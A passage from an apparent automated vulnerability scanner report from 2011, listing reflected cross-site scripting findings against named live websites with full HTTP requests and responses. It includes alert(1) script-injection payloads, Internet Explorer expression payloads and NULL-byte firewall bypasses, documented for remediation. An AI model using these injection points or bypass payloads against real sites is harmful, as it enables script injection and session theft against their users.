GET /pop/films/-/-/3.html?ef06b"><script>alert(1)</script>06db0769bba=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:56 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/D.html?ef06b"><script>alert(1)</script>06db0769bba=1" title="Search discussions for item "D""> ...[SNIP]...
3.45. http://boardreader.com/pop/instructions/-/-/7.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/pop/instructions/-/-/7.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5f8"><script>alert(1)</script>69f17f800bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/instructions/-/-/7.html?9a5f8"><script>alert(1)</script>69f17f800bf=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:57 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/How%2Bto%2BBuild%2Ban%2BEarthbag%2BDome.html?9a5f8"><script>alert(1)</script>69f17f800bf=1" title="Search discussions for item "How to Build an Earthbag Dome""> ...[SNIP]...
3.46. http://boardreader.com/pop/news/-/-/3.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/pop/news/-/-/3.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633c8"><script>alert(1)</script>21ff8f9967b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/news/-/-/3.html?633c8"><script>alert(1)</script>21ff8f9967b=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:32:01 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/Chinese%2Bair%2Bforce%2Bdrill%2Blooks%2Bawfully%2Bsimilar%2Bto%2B%25E2%2580%2598Top%2BGun%25E2%2580%2599.html?633c8"><script>alert(1)</script>21ff8f9967b=1" title="Search discussions for item "Chinese air force drill looks awfully similar to ...Top Gun...""> ...[SNIP]...
3.47. http://boardreader.com/pop/releases/-/-/3.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/pop/releases/-/-/3.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccc3d"><script>alert(1)</script>263690e9a78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/releases/-/-/3.html?ccc3d"><script>alert(1)</script>263690e9a78=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:58 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/Hyundai%2BMotor%2BAmerica%2BReports%2BRecord%2BJanuary%2BSales%2B--%2BFOUNTAIN%2BVALLEY%252C%2BCalif.%252C%2BFeb.%2B1%252C%2B2011%2B%252FPRNewswire%252F%2B--.html?ccc3d"><script>alert(1)</script>263690e9a78=1" title="Search discussions for item "Hyundai Motor America Reports Record January Sales -- FOUNTAIN VALLEY, Calif., Feb. 1, 2011 /PRNewswire/ --""> ...[SNIP]...
3.48. http://boardreader.com/pop/sites.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/pop/sites.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c1aa'><script>alert(1)</script>341d035808d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:56 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href='/pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1&o=10'> ...[SNIP]...
3.49. http://boardreader.com/pop/videos/-/-/3.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/pop/videos/-/-/3.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2008f"><script>alert(1)</script>ade1aee3939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/videos/-/-/3.html?2008f"><script>alert(1)</script>ade1aee3939=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:32:03 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/Today%2BShow%2BJanuary%2B1994...What%2Bis%2Bthe%2BInternet%253F%253F.html?2008f"><script>alert(1)</script>ade1aee3939=1" title="Search discussions for item "Today Show January 1994...What is the Internet??""> ...[SNIP]...
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload f1c31<script>alert(1)</script>9c812db7f39 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /services/messagebroker/amf?playerKey=AQ~~,AAAADnAS0wE~,ddeyF9dBubzZEABHXI8Tafb593RYf5ad HTTP/1.1 Host: c.brightcove.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart= content-type: application/x-amf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 538
The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 91ccd<script>alert(1)</script>82e43485041 was submitted in the rdid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload 26709<script>alert(1)</script>40fb537d3b1 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 5634a<script>alert(1)</script>fed7ed4bbdf was submitted in the rdid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=1201083812220968228"%3E%3C/script%3E5634a<script>alert(1)</script>fed7ed4bbdf HTTP/1.1 Host: cbi.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript; charset="UTF-8" Date: Thu, 03 Feb 2011 19:47:51 GMT Content-Length: 153
/* An error has occured: java.lang.NumberFormatException: For input string: "1201083812220968228"></script>5634a<script>alert(1)</script>fed7ed4bbdf" */
The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload fe98c<script>alert(1)</script>3b948965da2 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013fe98c<script>alert(1)</script>3b948965da2&rdid=1201083812220968228"%3E%3C/script%3E HTTP/1.1 Host: cbi.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript; charset="UTF-8" Date: Thu, 03 Feb 2011 19:47:48 GMT Content-Length: 141
/* An error has occured: java.lang.NumberFormatException: For input string: "798708614246318013fe98c<script>alert(1)</script>3b948965da2" */
3.55. http://clicktoverify.truste.com/pvr.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clicktoverify.truste.com
Path:
/pvr.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload e483d%20style%3dx%3aexpression(alert(1))%207543349c09e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e483d style=x:expression(alert(1)) 7543349c09e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b was submitted in the sealid parameter. This input was echoed as bb24b style=x:expression(alert(1)) 38cf935101b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b HTTP/1.1 Host: clicktoverify.truste.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:48:18 GMT Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4 X-Powered-By: PHP/5.1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 8370
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Validation Page for Online Privacy Certification by TRUSTe</title> <meta nam ...[SNIP]... <input type='hidden' name='sealid' value=101bb24b style=x:expression(alert(1)) 38cf935101b> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e63"><script>alert(1)</script>ac88b9e9cb was submitted in the REST URL parameter 1. This input was echoed as c6e63"><script>alert(1)</script>ac88b9e9cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00c6e63"><script>alert(1)</script>ac88b9e9cb/2006/03/base/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:50:16 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1785 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00f1926<a>d08f4d1b1f6 was submitted in the REST URL parameter 1. This input was echoed as f1926<a>d08f4d1b1f6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00f1926<a>d08f4d1b1f6/2006/03/base/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:50:17 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1643 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98ff3<a>94fdf96a678 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/base98ff3<a>94fdf96a678/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:50:54 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Thu, 03 Feb 2011 19:50:55 GMT Last-Modified: Thu, 03 Feb 2011 19:50:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1351 Connection: close Content-Type: text/html; charset=UTF-8
3.60. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dean.edwards.name
Path:
/weblog/2006/03/base/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae08"><script>alert(1)</script>c1a45a5709b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fae08\"><script>alert(1)</script>c1a45a5709b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/03/base/?fae08"><script>alert(1)</script>c1a45a5709b=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a084d"><script>alert(1)</script>ceea5e5408a was submitted in the REST URL parameter 1. This input was echoed as a084d"><script>alert(1)</script>ceea5e5408a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00a084d"><script>alert(1)</script>ceea5e5408a HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 373f2<script>alert(1)</script>e896c8e12b was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr373f2<script>alert(1)</script>e896c8e12b&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 326 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:25 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:25 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842125.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 13:54:01 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Fri, 04 Feb 2011 17:55:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 04 Feb 2011 17:55:25 GMT Connection: close
3.63. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad9c"><script>alert(1)</script>ce5a88a8f06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?2ad9c"><script>alert(1)</script>ce5a88a8f06=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Thu, 03 Feb 2011 22:06:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 117121
The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 714d6<script>alert(1)</script>a1c7f770126 was submitted in the version parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/veoh-ie6.css?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126 HTTP/1.1 Host: ll-appserver.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.0.10.1296766388;
div.spacer{clear:both;line-height:0px;font-size:0px;height:60px}div.smallSpacer{clear:both;line-height:0px;font-size:0px;height:20px}div.tinySpacer{clear:both;line-height:0px;font-size:0px;height:8px} ...[SNIP]... kenOut li{border:0;border-right:1px solid #d7d7d7;background:none}#bodyLevelThumbTip_leftOf .thumbMeta{background:transparent url(../images/hoverdetails_bg_shadow_right.png?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126) no-repeat scroll center bottom}#veohPage, #contentHolder_watchFull #playerBottomOuterWrapper,#commentLoginWrapper{background-color:#fff}#contentHolder_watchFull #watch-controls, div.chooseCat ul li a ...[SNIP]...
The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 88ebc<script>alert(1)</script>9e1cf63d45e was submitted in the version parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/veoh.css?version=AFrontend.5.5.4.103888ebc<script>alert(1)</script>9e1cf63d45e HTTP/1.1 Host: ll-appserver.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"
3.66. http://managedq.com/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://managedq.com
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65f22"%3balert(1)//e219070d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 65f22";alert(1)//e219070d6eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.php?q=o/65f22"%3balert(1)//e219070d6ebbama HTTP/1.1 Host: managedq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:41 GMT Server: Apache Vary: Accept-Encoding Content-Length: 13527 Connection: close Content-Type: text/html
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8e1"%3balert(1)//d33907aeb4e was submitted in the q parameter. This input was echoed as be8e1";alert(1)//d33907aeb4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.php?q=obamabe8e1"%3balert(1)//d33907aeb4e HTTP/1.1 Host: managedq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:37 GMT Server: Apache Vary: Accept-Encoding Content-Length: 13526 Connection: close Content-Type: text/html
3.68. http://my.supermedia.com/customersupport/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://my.supermedia.com
Path:
/customersupport/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33517"><script>alert(1)</script>270ee3472e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1 HTTP/1.1 Host: my.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:48:30 GMT Content-Length: 19431 Connection: close Content-Type: text/html; charset=ISO-8859-1 Server: Unspecified Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly
